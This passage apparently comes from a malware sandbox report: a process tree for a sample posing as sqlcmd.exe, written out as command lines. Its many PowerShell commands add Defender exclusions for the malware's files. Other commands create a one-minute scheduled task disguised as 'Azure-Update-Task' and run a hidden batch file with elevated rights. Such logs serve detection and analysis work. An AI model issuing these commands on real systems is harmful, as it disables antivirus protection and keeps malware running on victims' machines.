    PID:660
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
      4⤵
      Creates scheduled task(s)
      PID:2716
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5608
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6712
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6468
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:3184
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4248
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:1212
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6488
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5604
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:1592
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2964
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:296
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7612
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5868
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6976
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7600
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4788
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7172
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:3840
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5064
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7724
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4700
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5552
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7304
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:192
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5180
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6588
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2876
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4616
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:464
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6080
- - C:\Users\Admin\AppData\Local\Temp\c6785802-698e-40c0-b4ed-28621f995d4f\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\c6785802-698e-40c0-b4ed-28621f995d4f\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\c6785802-698e-40c0-b4ed-28621f995d4f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:3648
  - - C:\Users\Admin\AppData\Local\Temp\c6785802-698e-40c0-b4ed-28621f995d4f\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\c6785802-698e-40c0-b4ed-28621f995d4f\AdvancedRun.exe" /SpecialRun 4101d8 3648
      4⤵
      PID:3096
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6396
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:2124
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
      4⤵
      Creates scheduled task(s)
      PID:6464
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5876
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6364
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4376
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7840
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5564
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7500
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6444
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5664
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4684
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4664
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4388
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7028
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5568
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4172
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5112
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:756
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7104
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4160
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4940
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:3748
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5752
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5720
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6840
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:3464
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4224
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:3652
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7152
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:1292
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:1992
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6036
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5204
- - C:\Users\Admin\AppData\Local\Temp\c8d3e9d4-b827-4c54-892f-d0995c037a96\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\c8d3e9d4-b827-4c54-892f-d0995c037a96\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\c8d3e9d4-b827-4c54-892f-d0995c037a96\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:6432
  - - C:\Users\Admin\AppData\Local\Temp\c8d3e9d4-b827-4c54-892f-d0995c037a96\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\c8d3e9d4-b827-4c54-892f-d0995c037a96\AdvancedRun.exe" /SpecialRun 4101d8 6432
      4⤵
      PID:1860
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6140
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:816
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
      4⤵
      Creates scheduled task(s)
      PID:1540
- C:\Users\Admin\AppData\Roaming\jwtwjbt
  C:\Users\Admin\AppData\Roaming\jwtwjbt
  2⤵
  - Suspicious use of SetThreadContext
  PID:3892
- - C:\Users\Admin\AppData\Roaming\jwtwjbt
    C:\Users\Admin\AppData\Roaming\jwtwjbt
    3⤵
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID:1576
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:2424
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2808
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:8148
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6024
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:8036
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7148
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4448
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5916
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5892
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6288
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2164
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:760
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:3380
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4584
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:2288
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5972
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2300
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:2120
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6412
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5584
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4352
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:1124
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:1196
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6232
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7488
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4720
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6624
